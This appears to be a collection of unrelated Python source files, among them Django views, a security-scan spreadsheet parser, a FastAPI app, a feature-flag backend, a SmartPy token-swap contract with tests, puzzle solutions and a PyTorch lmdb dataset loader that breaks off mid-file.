'repositories' class UserRolesList(base_views.SubListAPIView): model = models.Content serializer_class = serializers.RoleDetailSerializer parent_model = User relationship = 'roles' def get_queryset(self): qs = super(UserRolesList, self).get_queryset() return qs.filter(active=True, is_valid=True) class UserSubscriptionList(base_views.SubListAPIView): model = models.Subscription serializer_class = serializers.SubscriptionSerializer parent_model = User relationship = 'subscriptions' class UserStarredList(base_views.SubListAPIView): model = models.Stargazer serializer_class = serializers.StargazerSerializer parent_model = User relationship = 'starred' class UserNotificationSecretList(base_views.SubListAPIView): model = models.NotificationSecret serializer_class = serializers.NotificationSecretSerializer parent_model = User relationship = 'notification_secrets'
python
import re import pandas as pd from dojo.models import Finding __author__ = 'Matt Sicker' class DsopParser: def __init__(self, file, test): self._test = test self._items = [] f = pd.ExcelFile(file) self.__parse_disa(pd.read_excel(f, sheet_name='OpenSCAP - DISA Compliance', parse_dates=['scanned_date'], dtype={'result': 'category', 'severity': 'category'})) self.__parse_oval(pd.read_excel(f, sheet_name='OpenSCAP - OVAL Results')) self.__parse_twistlock( pd.read_excel(f, sheet_name='Twistlock Vulnerability Results', dtype={'severity': 'category'})) self.__parse_anchore(pd.read_excel(f, sheet_name='Anchore CVE Results', dtype={'severity': 'category'})) self.__parse_anchore_compliance( pd.read_excel(f, sheet_name='Anchore Compliance Results', dtype={'severity': 'category'})) def __parse_disa(self, df: pd.DataFrame): for row in df.itertuples(index=False): if row.result not in ('fail', 'notchecked'): continue title = row.title unique_id = row.ruleid if row.severity == 'unknown': severity = 'Info' else: severity = row.severity.title() cve = row.identifiers references = row.refs description = row.desc impact = row.rationale date = row.scanned_date.date() tags = "disa" finding = Finding(title=title, date=date, cve=cve, severity=severity, description=description, impact=impact, references=references, test=self._test, unique_id_from_tool=unique_id, static_finding=True, dynamic_finding=False) finding.unsaved_tags = tags self._items.append(finding) def __parse_oval(self, df: pd.DataFrame): severity_pattern = re.compile(r'\((.*)\)') for row in df.itertuples(index=False): if not row.result or row.result in ('false'): continue title = row.title match = severity_pattern.search(title) if match: sev = match.group(1) if sev == 'Important': severity = 'High' elif sev == 'Moderate': severity = 'Medium' elif sev == 'None': severity = 'Info' else: severity = sev else: severity = 'Info' unique_id = row.id cve = row.ref tags = "oval" finding = Finding(title=title, cve=cve, severity=severity, unique_id_from_tool=unique_id, test=self._test, static_finding=True, dynamic_finding=False) finding.unsaved_tags = tags self._items.append(finding) def __parse_twistlock(self, df: pd.DataFrame): for row in df.itertuples(index=False): cve = row.id description = row.desc mitigation = row.status url = row.link component_name = row.packageName component_version = row.packageVersion title = '{}: {} - {}'.format(cve, component_name, component_version) if row.severity == 'important': severity = 'High' elif row.severity == 'moderate': severity = 'Medium' else: severity = row.severity.title() severity_justification = row.vecStr tags = "twistlock" finding = Finding(title=title, cve=cve, url=url, severity=severity, description=description, component_name=component_name, component_version=component_version, severity_justification=severity_justification, test=self._test, static_finding=True, dynamic_finding=False) finding.unsaved_tags = tags self._items.append(finding) def __parse_anchore(self, df: pd.DataFrame): for row in df.itertuples(index=False): cve = row.cve severity = row.severity component = row.package file_path = row.package_path mitigation = row.fix description = "Image affected: {}".format(row.tag) title = '{}: {}'.format(cve, component) tags = "anchore" finding = Finding(title=title, cve=cve, severity=severity, mitigation=mitigation, component_name=component, description=description, test=self._test, static_finding=True, dynamic_finding=False, file_path=file_path) finding.unsaved_tags = tags self._items.append(finding) def __parse_anchore_compliance(self, df: pd.DataFrame): for row in df.itertuples(index=False): if row.policy_id != "DoDFileChecks": continue if row.gate_action == "warn": severity = "Medium" elif row.gate_action == "stop": severity = "Critical" else: severity = "Info" severity = severity mitigation = "To be investigated" description = "Gate: {} (Trigger: {}): {}".format(row.gate, row.trigger, row.check_output) title = '{}: {}'.format(row.policy_id, row.trigger_id) tags = "anchore_compliance" finding = Finding(title=title, severity=severity, mitigation=mitigation, description=description, test=self._test, static_finding=True, dynamic_finding=False) finding.unsaved_tags = tags self._items.append(finding) @property def items(self): return self._items
python
from exterminate.Utilities import builtins from exterminate.Gizoogle import translate _print = builtins.print builtins.print = lambda *args, **kwargs: _print( translate(' '.join([str(x) for x in args])), **kwargs )
python
from builtins import object import abc from future.utils import with_metaclass class Solver(with_metaclass(abc.ABCMeta, object)): def __init__(self, **kwargs): self.options = kwargs if 'verbose' not in self.options: self.options['verbose'] = False @abc.abstractmethod def solve(self, p): """Solve QP problem """ pass
python
# Copyright (c) 2015 Microsoft Corporation from z3 import * set_option(auto_config=True) x = Int('x') y = Int('y') f = Function('f', IntSort(), IntSort()) solve(f(f(x)) == x, f(x) == y, x != y)
python
"""Capture synthesizer audio for each of a batch of random chords. By default, prints the number of JACK xruns (buffer overruns or underruns) produced during the MIDI playback and capture process. """ import cProfile import datetime import json import os import pstats import time import numpy as np import scipy.io.wavfile import muser.audio as audio import muser.live as live import muser.sequencer as sequencer import muser.utils as utils rnd = np.random.RandomState() date = datetime.datetime.now().strftime("%y%m%d-%Hh%M") ## Output configuration out_dir = '/tmp/muser/chord_batches' # save each chord's captured audio data to a .wav file wav_out = False # profile the audio capture operation profile_capture = False ## Chord generation and capture parameters batches = 10 batch_size = 32 chord_size = 1 #lambda: rnd.randint(1, 4) # function to generate random velocity vectors chord_gen = sequencer.random_velocity_vector # scalar or range of velocity velocity = (30, 128) # duration of silence captured efore sending chord's events init_silence = 0.1 # duration of capture, before and after chord release chord_time = 2.0 release_time = 0.0 ## Synthesizer parameters pianoteq_stereo = dict( name='Pianoteq55', midi_inports=['Pianoteq55:midi_in'], outports=['Pianoteq55:out_1', 'Pianoteq55:out_2'], reset=(0xB0, 0, 0), ) ## File name and path formats out_subdir = os.path.join(out_dir, date) os.makedirs(out_subdir, exist_ok=True) names = dict( pickle='batch{}.pickle', wav='batch{}-chord{}.wav', start_log='params.json', end_log='end_log', capture_profile='capture_events-batch{}_chord{}-profile', ) paths = {k: os.path.join(out_subdir, name) for k, name in names.items()} ## Data structure for chord batches chord_dtype = np.dtype([('velocity_vector', np.float32, sequencer.N_PITCHES), ('captured_buffers', object)]) batch = np.ndarray([batch_size], dtype=chord_dtype) ## JACK client initialization client = live.SynthInterfaceClient(synth_config=pianoteq_stereo) blocksize, samplerate = client.blocksize, client.samplerate ## Write to parameter log---for file monitors # TODO: update utils.FileMonitor to use JSON logs with open(paths['start_log'], 'w') as start_log: params = {'paths': paths, 'samplerate': samplerate, 'blocksize': blocksize, 'batches': batches, 'batch_size': batch_size, 'times': [init_silence, chord_time, release_time]} start_log.write(json.dumps(params)) with client: client.connect_synth() start_clock = time.perf_counter() for i_batch in range(batches): # generate batch of random chords (velocity vectors) batch['velocity_vector'] = [chord_gen(chord_size, velocity=velocity) for _ in range(batch_size)] for i_chord, chord in enumerate(batch): init_pause = {'events': None, 'duration': init_silence} # prepare the chord's MIDI events velocity_vector = chord['velocity_vector'] notes_on = sequencer.vector_to_midi_events('ON', velocity_vector) on_events = {'events': notes_on, 'duration': chord_time} notes_off = sequencer.vector_to_midi_events('OFF', velocity_vector) off_events = {'events': notes_off, 'duration': release_time} # collate event groups for client.capture_events event_groups = [init_pause, on_events, off_events] # send the event groups to the client for capture if profile_capture: name_i = paths['capture_profile'].format(i_batch, i_chord) cProfile.run('client.capture_events(event_groups)', name_i) else: client.capture_events(event_groups) # retrieve the captured audio for the chord chord['captured_buffers'] = client.drop_captured() # save the chord audio data to a .wav file if wav_out: snd = audio.buffers_to_snd(chord['captured_buffers']) wav_path = paths['wav'].format(i_batch, i_chord) scipy.io.wavfile.write(wav_path, samplerate, snd) batch.dump(paths['pickle'].format(i_batch)) ## print profile of the capture operation # TODO: statistics across chord profiles if profile_capture: # (currently prints profile for first captured chord only) name = paths['capture_profile'].format(0, 0) profile = pstats.Stats(name).strip_dirs() profile.sort_stats('time').print_stats(10) ## generate and write post-capture log log_str = "Captured {} batches of {} chords, at [s]:\n".format(batches, batch_size) log_str += utils.logs_entryexit(client.capture_log, output_labels={None: 'Xrun'}, ref_clock=start_clock, header=('Start', 'End')) xrun_print_end = ', at:' if client.n_xruns else '.' log_str += "\n\n{} total Xruns{}\n".format(client.n_xruns, xrun_print_end) for xrun in client.xruns - start_clock: log_str += '{:10.4f} s\n'.format(xrun[0]) print('\n' + log_str) with open(paths['end_log'], 'w') as end_log: end_log.write(log_str)
python
#swap 4 variables # swap variable w=input("enter any nymber") x=input("enter any nymber") y=input("enter any number") z=input("enter any number") print("w before swap :{}".format(w)) print("x before swap:{}".format(x)) print("y before swap :{}".format(y)) print("z before swap :{}".format(z)) w=w+x+y+z x=w-x-y-z print("x after swap is {}".format(x)) y=w-x-y-z print("y after swap is {}".format(y)) z=w-x-y-z print("z after swap is {}".format(z)) w=w-x-y-z print("w after swap is {}".format(w))
python
#!/usr/bin/python # -*- coding: utf-8 -*- from __future__ import print_function from __future__ import absolute_import from __future__ import division from __future__ import unicode_literals from django.http import HttpResponse from django.template import Template, RequestContext from django.shortcuts import render from metahumans import models # Create your views here. def all_heroes(request): return render(request, 'metahumans/list_heroes.html', { 'heroes': models.SuperHero.objects.select_related('team').all(), 'title': 'Listado de superhéroes', }) def list_levels(request): return render(request, 'metahumans/levels.html', { 'heroes': models.SuperHero.objects.only('name', 'level').all().order_by('-level'), 'title': 'Listado de superhéroes por niveles', }) def hero_details(request, slug): sh = models.SuperHero.objects.get(slug=slug) return render(request, 'metahumans/hero_details.html', { 'superhero': sh, 'title': sh.name, })
python
import UpdateItem as ui import UpdateChecker as uc import UpdateFileReader as ufr import tkinter from tkinter import messagebox is_verbose = True root = tkinter.Tk() root.withdraw() userfile = "updateList.txt" currentReader = ufr.UpdateFileReader(userfile, is_verbose) while currentReader.getNextItem(): currentItem = currentReader.getCurrentItemData() if currentItem: currentSoftware = uc.UpdateChecker(currentItem, is_verbose) if currentSoftware.status: currentVersion = currentSoftware.getCurrentVersion() if currentVersion.new_version: msg_result = messagebox.askyesno("Update available for " + currentVersion.name,"Version " + currentVersion.version_info + " available for " + currentVersion.name + " (current: " + currentVersion.installed_version + ") Have you updated yet?") if msg_result: currentItem.installed_version = currentVersion.version_info currentReader.updateCurrentItemData(currentItem)
python
# Modified: 2022-06-02 # Description: Defines the FastAPI app # from pathlib import Path from motor.motor_asyncio import AsyncIOMotorClient from fastapi import FastAPI from fastapi.middleware.cors import CORSMiddleware from fastapi.staticfiles import StaticFiles from controllers import game_controller, player_controller from db import db from config import settings # create the app app = FastAPI() # attach CORS middleware; current settings are only appropriate for development environments origins = [ "http://localhost", ] app.add_middleware( CORSMiddleware, allow_origins=origins, allow_credentials=True, allow_methods=["*"], allow_headers=["*"], ) class ReactStaticFiles(StaticFiles): """Extends StaticFiles to allow React SPA to handle 404s""" async def get_response(self, path, scope): res = await super().get_response(path, scope) if res.status_code == 404: # funnel 404s back to React App: source https://stackoverflow.com/a/68363904 res = await super().get_response('.', scope) return res # attach API endpoints app.include_router(game_controller.router, tags=["game"], prefix="/api/game") app.include_router(player_controller.router, tags=["player"], prefix="/api/player") if settings.STATIC_CONTENT_SRV and Path(settings.STATIC_CONTENT_DIR).is_dir(): app.mount("/", ReactStaticFiles(directory=settings.STATIC_CONTENT_DIR, html=True), name="static") # open an asynchronous database connection on startup @app.on_event("startup") async def open_mongodb_connection(): print("Connecting to MongoDB client...") db.client = AsyncIOMotorClient(settings.MONGODB_URI) await db.index() # index the db for faster lookups and to enforce uniqueness print("Connection successful" if db.client else "Connection failed") # close the asynchronous database connection on shutdown @app.on_event("shutdown") async def close_mongodb_connection(): print("Closing connection to MongoDB client...") db.client.close()
python
''' Modified run-length encoding. Modify the result of problem P10 in such a way that if an element has no duplicates it is simply copied into the result list. Only elements with duplicates are transferred as (N E) lists. Example: * (encode-modified '(a a a a b c c a a d e e e e)) ((4 A) B (2 C) (2 A) D (4 E)) ''' ''' Modified run-length encoding. Modify the result of problem P10 in such a way that if an element has no duplicates it is simply copied into the result list. Only elements with duplicates are transferred as (N E) lists. Example: * (encode-modified '(a a a a b c c a a d e e e e)) ((4 A) B (2 C) (2 A) D (4 E)) ''' #taking input of list elements at a single time seperating by space and splitting each by split() method demo_list = input("Enter elememts sep by space: ").split(' ') #creating new lists runLength_converted_list = list() encoded_list = list() previous_item = demo_list[0] #assigning first element of demo_list to previous_item temp_list = list() #creating new list as temp_list for current_item in demo_list: #iterating through all elements of demo_list if current_item == previous_item: #checking if previously added element is same as current element of list, for checking repetative elements temp_list.append(current_item) #appending current element to temp_list. for creation of sublist else: #if not repetative element runLength_converted_list.append(temp_list[:]) #appending previously created sublist(temp_list) copy to new_list temp_list.clear() #clearing temp_list to create new sublist temp_list.append(current_item) #appending current_item to temp_list previous_item = current_item #assigning current_item to previous_item else: runLength_converted_list.append(temp_list[:]) #appending temp_list copy to new_list for item in runLength_converted_list: #iterating through all elements of demo_list count_sublist_items = len(item) #new_list contains sublist of repetative elements, so finding size of sublist and appending to temp_list. if count_sublist_items == 1: encoded_list.append(item[0]) else: encoded_list.append([count_sublist_items,item[0]]) #appending temp_list to encoded_list #pritning demo_list and its encoded list print(f"old list: {demo_list}") print(f"encoded list: {encoded_list}")
python
import dash_html_components as html class Component: def render(self) -> html.Div: raise NotImplementedError
python
# The MIT License (MIT) # # Copyright (c) 2014 Steve Milner # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to # deal in the Software without restriction, including without limitation the # rights to use, copy, modify, merge, publish, distribute, sublicense, and/or # sell copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. """ SQLAlchemy backend. """ from sqlalchemy import ( Column, Integer, SmallInteger, String, ForeignKey, create_engine) from sqlalchemy.orm import relationship, sessionmaker from sqlalchemy.ext.declarative import declarative_base from flagon import errors from flagon.backends import Backend Base = declarative_base() class Feature(Base): __tablename__ = 'features' name = Column(String, primary_key=True) active = Column(SmallInteger) strategy = Column(String) params = relationship('Param', backref='feature') class Param(Base): __tablename__ = 'params' id = Column(Integer, primary_key=True) name = Column(String) value = Column(String) feature_id = Column(Integer, ForeignKey('features.name')) class SQLAlchemyBackend(Backend): def __init__(self, connection_str): """ :param connection_str: information can be found at http://docs.sqlalchemy.org/en/rel_0_9/core/engines.html Example: sqlite:///test.db :type connection_str: str :rtpe: SQLAlchemyBackend """ self._engine = create_engine(connection_str, echo=False) Base.metadata.create_all(self._engine) self._session = sessionmaker(bind=self._engine).__call__() def exists(self, name): """ Checks if a feature exists. :param name: name of the feature. :rtype: bool """ return bool(self._session.query(Feature).filter_by(name=name).count()) def is_active(self, name): """ Checks if a feature is on. :param name: name of the feature. :rtype: bool :raises: UnknownFeatureError """ if not self.exists(name): raise errors.UnknownFeatureError('Unknown feature: %s' % name) feature = self._session.query(Feature).filter_by(name=name).first() return bool(feature.active) def _turn(self, name, value): """ Turns a feature on. :param name: name of the feature. :param value: 0 or 1 :raises: UnknownFeatureError """ if not self.exists(name): raise errors.UnknownFeatureError('Unknown feature: %s' % name) self._session.merge(Feature(name=name, active=value)) self._session.commit() turn_on = lambda s, name: s._turn(name, 1) turn_off = lambda s, name: s._turn(name, 2)
python
import smartpy as sp FA12 = sp.io.import_script_from_url("file:Fa12.py", name="FA12") """ Possible states of the swap """ class State(): Waiting = 1 Initiated = 2 """ Swap record - hashedSecret(bytes): current swap hash initiator(address): initiators tezos address initiator_eth_addr(string): initiators ethereum address participant(address): counter-party/participant's tezos address refundTimestamp(timestamp): unix time(sec) after which the swap expires value(nat): value of the swap in fa1.2 tokens state(State): current state of swap """ Swap = sp.TRecord(hashedSecret=sp.TBytes, initiator_eth_addr=sp.TString, initiator=sp.TAddress, participant=sp.TAddress, refundTimestamp=sp.TTimestamp, value=sp.TNat, state=sp.TInt) """ Contract Storage - admin(address): tezos address of the admin reward(nat): reward in basis points for swap response fa12(address): fa1.2 contract address active(bool): contract state [true:active, false:inactive] swaps(big_map(bytes,Swap)): map of hashed secrets and swap details """ class TokenSwap(sp.Contract): def __init__(self, _admin, _fa12): self.init(admin=_admin, reward=sp.as_nat(15), fa12=_fa12, active=sp.bool(False), swaps=sp.big_map(tkey=sp.TBytes, tvalue=Swap)) """ ensures only admin can call a function """ def onlyByAdmin(self): sp.verify(sp.sender == self.data.admin) """ ensures only initiator of the swap can call a function args: _hashedSecret: hashed secret of the swap """ def onlyByInitiator(self, _hashedSecret): sp.verify(sp.sender == self.data.swaps[_hashedSecret].initiator) """ checks if the contract is active """ def contractIsActive(self): sp.verify(self.data.active == sp.bool(True)) """ checks whether a swap can be initiated args: _hashedSecret: hashed secret of the swap _refundTimestamp: unix time(sec) after which the swap expires """ def isInitiable(self, _hashedSecret, _refundTimestamp): sp.verify(~self.data.swaps.contains(_hashedSecret)) sp.verify(sp.now < _refundTimestamp) """ ensures the currest swap state matches the required `state` args: _hashedSecret: hashed secret of the swap _state: state the current swap is expected to be in """ def checkState(self, _hashedSecret, _state): sp.verify(self.data.swaps[_hashedSecret].state == _state) """ checks whether the swap can be redeemed args: _hashedSecret: hashed secret of the swap _secret: secret for the swap which produced the corresponding hashedSecret """ def isRedeemable(self, _hashedSecret, _secret): sp.verify(self.data.swaps[_hashedSecret].refundTimestamp > sp.now) sp.verify(self.data.swaps[_hashedSecret].hashedSecret == sp.sha256( sp.sha256(_secret))) """ checks whether the swap can bve refunded args: _hashedSecret: hashed secret of the swap """ def isRefundable(self, _hashedSecret): sp.verify((self.data.swaps[_hashedSecret].state == State.Initiated) | ( self.data.swaps[_hashedSecret].state == State.Waiting)) sp.verify(self.data.swaps[_hashedSecret].refundTimestamp <= sp.now) """ Toggle contract active state args: _active: boolean value [tru:active, false:inactive] representing contract state """ @sp.entry_point def toggleContractState(self, _active): self.onlyByAdmin() self.data.active = _active """ Update reward for swaps responses args: _reward: a value representing the reward basis points """ @sp.entry_point def updateReward(self, _reward): self.onlyByAdmin() self.data.reward = _reward """ Initiate new swap without counterParty details args: _hashedSecret: hash of the current swap secret _initiator_eth_addr: tezos address of the current swap initiator _amount: amount of fa1.2 tokens exchanged in the swap _refundTimestamp: unix time(sec) after which the swap expires """ @sp.entry_point def initiateWait(self, _amount, _hashedSecret, _refundTimestamp, initiator_eth_addr): self.contractIsActive() self.isInitiable(_hashedSecret, _refundTimestamp) c = sp.contract(sp.TRecord(from_=sp.TAddress, to_=sp.TAddress, value=sp.TNat).layout(("from_ as from", ("to_ as to", "value"))), self.data.fa12, entry_point="transfer").open_some() transferData = sp.record( from_=sp.sender, to_=sp.self_address, value=_amount) sp.transfer(transferData, sp.mutez(0), c) self.data.swaps[_hashedSecret] = sp.record(hashedSecret=_hashedSecret, initiator_eth_addr=initiator_eth_addr, initiator=sp.sender, participant=sp.sender, refundTimestamp=_refundTimestamp, value=_amount, state=State.Waiting) """ Add counter-party details to an existing(initiated) swap args: _hashedSecret: hashed secret of the swap being updated _participant: participant/counter-party tezos address """ @sp.entry_point def addCounterParty(self, _hashedSecret, _participant): self.contractIsActive() self.checkState(_hashedSecret, State.Waiting) self.onlyByInitiator(_hashedSecret) self.data.swaps[_hashedSecret].state = State.Initiated self.data.swaps[_hashedSecret].participant = _participant """ Redeem the swap if possible args: _hashedSecret: hashed secret of the swap being redeemed _secret: secret for the swap which produced the corresponding hashedSecret """ @sp.entry_point def redeem(self, _hashedSecret, _secret): self.checkState(_hashedSecret, State.Initiated) self.isRedeemable(_hashedSecret, _secret) c = sp.contract(sp.TRecord(from_=sp.TAddress, to_=sp.TAddress, value=sp.TNat).layout(("from_ as from", ("to_ as to", "value"))), self.data.fa12, entry_point="transfer").open_some() transferData = sp.record( from_=sp.self_address, to_=self.data.swaps[_hashedSecret].participant, value=self.data.swaps[_hashedSecret].value) sp.transfer(transferData, sp.mutez(0), c) del self.data.swaps[_hashedSecret] """ Refund the swap if possible args: _hashedSecret: hashed secret of the swap being refunded """ @sp.entry_point def refund(self, _hashedSecret): self.isRefundable(_hashedSecret) c = sp.contract(sp.TRecord(from_=sp.TAddress, to_=sp.TAddress, value=sp.TNat).layout(("from_ as from", ("to_ as to", "value"))), self.data.fa12, entry_point="transfer").open_some() transferData = sp.record( from_=sp.self_address, to_=self.data.swaps[_hashedSecret].initiator, value=self.data.swaps[_hashedSecret].value) sp.transfer(transferData, sp.mutez(0), c) del self.data.swaps[_hashedSecret] @sp.add_test(name="Token Swap") def test(): admin = sp.test_account("Administrator") alice = sp.test_account("Alice") bob = sp.test_account("Bob") init_eth = "0x91f79893E7B923410Ef1aEba6a67c6fab0sfsdgffd" hashSecret = sp.sha256(sp.sha256(sp.bytes( "0x68656c6c6f666473667364666c64736a666c73646a6664736a6673646a6b666a"))) token_metadata = { "decimals" : "18", # Mandatory by the spec "name" : "My Great Token", # Recommended "symbol" : "MGT", # Recommended # Extra fields "icon" : 'https://smartpy.io/static/img/logo-only.svg' } contract_metadata = { "" : "ipfs://QmaiAUj1FFNGYTu8rLBjc3eeN9cSKwaF8EGMBNDmhzPNFd", } c2 = FA12.FA12(admin.address, config = FA12.FA12_config(support_upgradable_metadata = True), token_metadata = token_metadata, contract_metadata = contract_metadata) c1 = TokenSwap(_admin=admin.address, _fa12=c2.address) scenario = sp.test_scenario() scenario.table_of_contents() scenario.h1("Atomic Swap") scenario += c1 scenario.h2("Accounts") scenario.show([admin, alice, bob]) scenario.h2("FA1.2") scenario.h3("Entry points") scenario += c2 scenario.h3("Admin mints a few coins") scenario += c2.mint(address=alice.address, value=12).run(sender=admin) scenario += c2.mint(address=alice.address, value=3).run(sender=admin) scenario += c2.mint(address=alice.address, value=3).run(sender=admin) scenario.h2("Alice approves Contract") scenario += c2.approve(spender=c1.address, value=10).run(sender=alice) scenario.h2("Swap[Wait] Testing") # no operations work without contract being active scenario += c1.initiateWait(_hashedSecret=hashSecret, initiator_eth_addr=init_eth, _refundTimestamp=sp.timestamp( 159682500), _amount=5).run(sender=alice, now=sp.timestamp(159682400), valid=False) # activate only by admin scenario += c1.toggleContractState(True).run(sender=alice, valid=False) scenario += c1.toggleContractState(True).run(sender=admin) # update reward only by admin scenario += c1.updateReward(50).run(sender=alice, valid=False) scenario += c1.updateReward(50).run(sender=admin) # initiate new swap scenario += c1.initiateWait(_hashedSecret=hashSecret, initiator_eth_addr=init_eth, _refundTimestamp=sp.timestamp( 159682500), _amount=5).run(sender=alice, now=sp.timestamp(159682400)) # balance check scenario.verify(c2.data.balances[c1.address].balance == sp.nat(5)) scenario.verify(c2.data.balances[alice.address].balance == sp.nat(13)) # cannot redeem before it is activated & initiated scenario += c1.redeem(_hashedSecret=hashSecret, _secret=sp.bytes( "0x68656c6c6f666473667364666c64736a666c73646a6664736a6673646a6b666a")).run(sender=bob, now=sp.timestamp(159682450), valid=False) # successful add participant only by initiator scenario += c1.addCounterParty(_hashedSecret=hashSecret, _participant=bob.address).run(sender=bob, valid=False) # successful add participant only by initiator scenario += c1.addCounterParty(_hashedSecret=hashSecret, _participant=bob.address).run(sender=alice) # cannot be redeemed with wrong secret scenario += c1.redeem(_hashedSecret=hashSecret, _secret=sp.bytes( "0x12345678aa")).run(sender=bob, now=sp.timestamp(159682450), valid=False) # cannot be redeemed after refundtime has come scenario += c1.redeem(_hashedSecret=hashSecret, _secret=sp.bytes( "0x68656c6c6f666473667364666c64736a666c73646a6664736a6673646a6b666a")).run(sender=bob, now=sp.timestamp(159682550), valid=False) # new swap with the same hash cannot be added unless the previous one is redeemed/refunded scenario += c1.initiateWait(_hashedSecret=hashSecret, initiator_eth_addr=init_eth, _refundTimestamp=sp.timestamp( 159682500), _amount=5).run(sender=alice, amount=sp.tez(2), now=sp.timestamp(159682400), valid=False) # successful redeem can be initiated by anyone but funds transfered to participant scenario += c1.redeem(_hashedSecret=hashSecret, _secret=sp.bytes("0x68656c6c6f666473667364666c64736a666c73646a6664736a6673646a6b666a")).run(sender=bob, now=sp.timestamp(159682450)) # balance check scenario.verify(c2.data.balances[c1.address].balance == sp.nat(0)) scenario.verify(c2.data.balances[bob.address].balance == sp.nat(5)) # successful swap creation with same hash after redeem scenario += c1.initiateWait(_hashedSecret=hashSecret, initiator_eth_addr=init_eth, _refundTimestamp=sp.timestamp( 159682500), _amount=5).run(sender=alice, now=sp.timestamp(159682400)) # balance check scenario.verify(c2.data.balances[c1.address].balance == sp.nat(5)) scenario.verify(c2.data.balances[alice.address].balance == sp.nat(8)) # cannot be refunded before the refundtime scenario += c1.refund(hashSecret).run(sender=bob, now=sp.timestamp(159682450), valid=False) scenario += c1.refund(hashSecret).run(sender=alice, now=sp.timestamp(159682450), valid=False) # can be refunded in any initated or waiting state if refund time has come, can be done by anyone but funds transfered only to initiator scenario += c1.refund(hashSecret).run(sender=bob, now=sp.timestamp(159682550)) # cannot be refunded again once it has been refunded scenario += c1.refund(hashSecret).run(sender=alice, now=sp.timestamp(159682550), valid=False) # balance check scenario.verify(c2.data.balances[c1.address].balance == sp.nat(0)) scenario.verify(c2.data.balances[alice.address].balance == sp.nat(13)) sp.add_compilation_target("TokenSwap", TokenSwap(_admin=sp.address("tz1Y8UNsMSCXyDgma8Ya51eLx8Qu4AoLm8vt"), _fa12=sp.address("KT1Y8UNsMSCXyDgma8Ya51eLx8Qu4AoLm8vt")), storage=None)
python
with open('Day10 input.txt') as f: lines = f.readlines() chunk_dict = { '(':')', '[':']', '{':'}', '<':'>' } score_dict = { ')':3, ']':57, '}':1197, '>':25137 } corrupted = [] score = 0 for line in lines: chunk = '' for l in line: if l in ['(','[','{','<']: chunk+=l print(chunk) if l in [')',']','}','>']: chunk, c = chunk[:-1], chunk[-1] if chunk_dict[c] != l: score += score_dict[l] print('Found an unexpected '+l) corrupted.append(line) break print(score) incompletes = [x for x in lines if x not in corrupted] inc_chunks = [] for inc in incompletes: chunk = '' for l in inc: if l in ['(','[','{','<']: chunk+=l print(chunk) if l in [')',']','}','>']: chunk = chunk[:-1] inc_chunks.append(chunk) inc_score_dict = { '(':1, '[':2, '{':3, '<':4 } inc_scores = [] for inc in inc_chunks: score = 0 for i in inc[::-1]: score *= 5 score += inc_score_dict[i] inc_scores.append(score) inc_scores.sort() print(inc_scores[(len(inc_scores)//2)])
python
#!/usr/bin/python # encoding: utf-8 import random import torch from torch.utils.data import Dataset from torch.utils.data import sampler import torchvision.transforms as transforms import lmdb import six import sys from PIL import Image import numpy as np # 关于lmdb数据库使用, 当时对接Python 2.x,所以使用Bytestrings,而不是unicode, # 所以在Python 3.x中要显示encode,decode。 # https://lmdb.readthedocs.io/en/release/ # uses bytestring to mean either the Python<=2.7 str() type, or the Python>=3.0 bytes() type, d # Always explicitly encode and decode any Unicode values before passing them to LMDB. class lmdbDataset(Dataset): def __init__(self, root=None, transform=None, target_transform=None): self.env = lmdb.open( root, max_readers=1, readonly=True, lock=False, readahead=False, meminit=False) if not self.env: print('cannot creat lmdb from %s' % (root)) sys.exit(0) with self.env.begin(write=False) as txn: nSamples = int(txn.get('num-samples'.encode()).decode()) self.nSamples = nSamples self.transform = transform self.target_transform = target_transform def __len__(self): return self.nSamples def __getitem__(self, index): assert index <= len(self), 'index range error' index += 1 with self.env.begin(write=False) as txn: img_key = 'image-%09d' % index imgbuf = txn.get(img_key.encode()) buf = six.BytesIO() buf.write(imgbuf) buf.seek(0) try: img = Image.open(buf).convert('L') except IOError: print('Corrupted image for %d' % index) return self[index + 1] if self.transform is not None: img = self.transform(img) label_key = 'label-%09d' % index label = txn.get(label_key.encode()).decode() if self.target_transform is not None: label = self.target_transform(label) return (img, label) class resizeNormalize(object): def __init__(self, size, interpolation=Image.BILINEAR): self.size = size self.interpolation = interpolation self.toTensor = transforms.ToTensor() def __call__(self, img): img = img.resize(self.size, self.interpolation) img = self.toTensor(img) img.sub_(0.5).div_(0.5) return img class randomSequentialSampler(sampler.Sampler): def __init__(self, data_source, batch_size): self.num_samples = len(data_source) self.batch_size = batch_size def __iter__(self): n_batch = len(self) // self.batch_size tail = len(self) % self.batch_size index = torch.LongTensor(len(self)).fill_(0) for i in range(n_batch): random_start = random.randint(0, len(self) - self.batch_size) batch_index = random_start + torch.range(0, self.batch_size - 1) index[i * self.batch_size:(i + 1) * self.batch_size] = batch_index # deal with tail if tail: random_start = random.randint(0, len(self) - self.batch_size) tail_index = random_start + torch.range(0, tail - 1) index[(i + 1) * self.batch_size:] = tail_index return iter(index) def __len__(self): return self.num_samples class alignCollate(object): def __init__(self, imgH=32, imgW=100, keep_ratio=False, min_ratio=1): self.imgH = imgH self.imgW = imgW self.keep_ratio = keep_ratio self.min_ratio = min_ratio def __call__(self, batch): images, labels = zip(*batch) imgH = self.imgH imgW = self.imgW output_images = [] for image in images: if self.keep_ratio: w, h = image.size ratio = w / float(h) imgW = int(np.floor(ratio * imgH)) imgW = min(imgH * self.min_ratio, imgW) # assure image.w <= imgW # resize to the same imgH transform = resizeNormalize((imgW, imgH)) output_images.append(transform(image)) # padding # image.shape i.e. (1, 32, 100) max_image_width = max([image.shape[2] for image in output_images]) max_label_length = max([len(label) for label in labels]) batch_size = len(output_images) channel_size = 1 inputs = np.zeros((batch_size, channel_size, imgH, max_image_width), dtype='float32') # '_' for blank label output_labels =[['_'] * max_label_length for _ in range(batch_size)] for x in 